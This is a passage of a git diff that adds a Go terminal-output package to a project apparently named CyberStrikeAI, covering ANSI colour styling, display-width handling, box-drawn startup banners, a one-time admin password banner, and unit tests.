s.Yellow("self-signed") + s.Dim(" · accept the browser warning once")) + } + if opts.HTTPRedirect { + s.Println(s.Dim(" Redirect ") + fmt.Sprintf("http://127.0.0.1:%d/ → HTTPS", port)) + } + s.BlankLine() +} + +// PrintBootstrapAdminCredentials prints the initial admin password banner. +func PrintBootstrapAdminCredentials(password string) { + password = strings.TrimSpace(password) + if password == "" { + return + } + + s := New(os.Stdout) + s.Println(s.Bold(s.Yellow("ADMIN SETUP REQUIRED"))) + s.Println(s.Dim(strings.Repeat("─", 60))) + s.Println(s.Dim(" Username ") + s.Bold(s.White("admin"))) + s.Println(s.Dim(" Password ") + s.Bold(s.Yellow(password))) + s.BlankLine() + s.Println(s.Yellow(" ! ") + s.White("Store this password securely. It is shown only once.")) + s.Println(s.Dim(" Change it in Settings immediately after signing in.")) + s.BlankLine() +} diff --git a/internal/termout/startup_test.go b/internal/termout/startup_test.go new file mode 100644 index 00000000..f01b610c --- /dev/null +++ b/internal/termout/startup_test.go @@ -0,0 +1,76 @@ +package termout + +import ( + "strings" + "testing" +) + +func TestDisplayWidthEmoji(t *testing.T) { + if got := displayWidth("🚀"); got != 2 { + t.Fatalf("displayWidth(emoji) = %d, want 2", got) + } + if got := displayWidth("ab"); got != 2 { + t.Fatalf("displayWidth(ab) = %d, want 2", got) + } +} + +func TestDisplayWidthIgnoresANSI(t *testing.T) { + s := New(nil) + colored := s.Bold("admin") + if got := displayWidth(colored); got != 5 { + t.Fatalf("displayWidth colored = %d, want 5", got) + } +} + +func TestPadRightDisplay(t *testing.T) { + got := padRightDisplay("pwd", 10) + if displayWidth(got) != 10 { + t.Fatalf("padded width = %d, want 10", displayWidth(got)) + } +} + +func TestColorDisabledWithoutTTY(t *testing.T) { + s := New(nil) + if s.enabled { + t.Fatal("expected colors disabled for nil writer") + } + if got := s.Cyan("x"); got != "x" { + t.Fatalf("Cyan without TTY = %q, want plain text", got) + } +} + +func TestPrintBootstrapAdminCredentialsEmpty(t *testing.T) { + PrintBootstrapAdminCredentials(" ") +} + +func TestPrintStartupWebUIOptions(t *testing.T) { + PrintStartupWebUI(StartupWebUIOptions{ + Scheme: "https", + Port: 8080, + SelfSigned: true, + HTTPRedirect: true, + }) +} + +func TestBoxRowAlignedWidth(t *testing.T) { + s := New(nil) + rows := []string{ + s.Bold("CyberStrikeAI") + s.White(" is ready"), + s.Dim("Web UI ") + s.Bold("https://127.0.0.1:8080/"), + } + inner := maxDisplayWidth(rows...) + for _, row := range rows { + line := s.boxRow(inner, row) + if !strings.Contains(line, "│") { + t.Fatalf("box row missing border: %q", line) + } + } +} + +func TestMaxDisplayWidth(t *testing.T) { + short := "abc" + long := "https://127.0.0.1:8080/" + if got := maxDisplayWidth(short, long); got != displayWidth(long) { + t.Fatalf("maxDisplayWidth = %d, want %d", got, displayWidth(long)) + } +} diff --git a/internal/termout/style.go b/internal/termout/style.go new file mode 100644 index 00000000..2a805de3 --- /dev/null +++ b/internal/termout/style.go @@ -0,0 +1,108 @@ +package termout + +import ( + "fmt" + "io" + "os" + "strings" +) + +const ( + codeReset = "\033[0m" + codeBold = "\033[1m" + codeDim = "\033[2m" + codeRed = "\033[31m" + codeGreen = "\033[32m" + codeYellow = "\033[33m" + codeBlue = "\033[34m" + codeCyan = "\033[36m" + codeWhite = "\033[97m" +) + +// Style wraps ANSI styling with TTY / NO_COLOR awareness. +type Style struct { + out io.Writer + enabled bool +} + +// New creates a Style writing to out (typically os.Stdout). +func New(out io.Writer) *Style { + return &Style{out: out, enabled: colorEnabled(out)} +} + +func colorEnabled(w io.Writer) bool { + if strings.TrimSpace(os.Getenv("NO_COLOR")) != "" { + return false + } + force := strings.TrimSpace(os.Getenv("FORCE_COLOR")) + if force == "1" || strings.EqualFold(force, "true") || strings.EqualFold(force, "yes") { + return true + } + f, ok := w.(*os.File) + if !ok { + return false + } + stat, err := f.Stat() + if err != nil { + return false + } + return stat.Mode()&os.ModeCharDevice != 0 +} + +func (s *Style) paint(code, text string) string { + if !s.enabled || text == "" { + return text + } + return code + text + codeReset +} + +func (s *Style) Bold(text string) string { return s.paint(codeBold, text) } +func (s *Style) Dim(text string) string { return s.paint(codeDim, text) } +func (s *Style) Red(text string) string { return s.paint(codeRed, text) } +func (s *Style) Green(text string) string { return s.paint(codeGreen, text) } +func (s *Style) Yellow(text string) string { return s.paint(codeYellow, text) } +func (s *Style) Blue(text string) string { return s.paint(codeBlue, text) } +func (s *Style) Cyan(text string) string { return s.paint(codeCyan, text) } +func (s *Style) White(text string) string { return s.paint(codeWhite, text) } + +func (s *Style) Println(text string) { + _, _ = fmt.Fprintln(s.out, text) +} + +func (s *Style) Printf(format string, args ...interface{}) { + _, _ = fmt.Fprintf(s.out, format, args...) +} + +func (s *Style) BlankLine() { + s.Println("") +} + +func (s *Style) boxTop(innerWidth int) string { + return s.Cyan("╭" + strings.Repeat("─", innerWidth+2) + "╮") +} + +func (s *Style) boxBottom(innerWidth int) string { + return s.Cyan("╰" + strings.Repeat("─", innerWidth+2) + "╯") +} + +func (s *Style) boxRow(innerWidth int, content string) string { + return s.Cyan("│ ") + padRightDisplay(content, innerWidth) + s.Cyan(" │") +} + +func (s *Style) printBox(rows []string, minInner, maxInner int) { + inner := maxDisplayWidth(rows...) + if inner < minInner { + inner = minInner + } + if maxInner > 0 && inner > maxInner { + inner = maxInner + } + + s.BlankLine() + s.Println(s.boxTop(inner)) + for _, row := range rows { + s.Println(s.boxRow(inner, row)) + } + s.Println(s.boxBottom(inner)) + s.BlankLine() +} diff --git a/internal/termout/width.go b/internal/termout/width.go new file mode 100644 index 00000000..9ea812bf --- /dev/null +++ b/internal/termout/width.go @@ -0,0 +1,73 @@ +package termout + +import ( + "regexp" + "strings" + "unicode/utf8" + + "golang.org/x/text/width" +) + +var ansiEscapeRe = regexp.MustCompile(`\x1b\[[0-9;]*m`) + +// displayWidth returns the terminal display width of text, ignoring ANSI codes. +func displayWidth(text string) int { + plain := ansiEscapeRe.ReplaceAllString(text, "") + w := 0 + for _, r := range plain { + w += runeDisplayWidth(r) + } + return w +} + +func runeDisplayWidth(r rune) int { + if r == utf8.RuneError { + return 0 + } + // Most emoji / symbols render as double-width in modern terminals. + if isEmojiLikeRune(r) { + return 2 + } + switch width.LookupRune(r).Kind() { + case width.EastAsianWide, width.EastAsianFullwidth: + return 2 + default: + return 1 + } +} + +func isEmojiLikeRune(r rune) bool { + switch { + case r >= 0x1F300 && r <= 0x1FAFF: // pictographs / emoji + return true + case r >= 0x2600 && r <= 0x27BF: // misc symbols + return true + case r >= 0x2300 && r <= 0x23FF: // misc technical (⌚ etc.) + return true + case r >= 0x2B50 && r <= 0x2B55: + return true + default: + return false + } +} + +func padRightDisplay(text string, target int) string { + if target <= 0 { + return "" + } + gap := target - displayWidth(text) + if gap <= 0 { + return text + } + return text + strings.Repeat(" ", gap) +} + +func maxDisplayWidth(rows ...string) int { + max := 0 + for _, row := range rows { + if w := displayWidth(row); w > max { + max = w + } + } + return max +}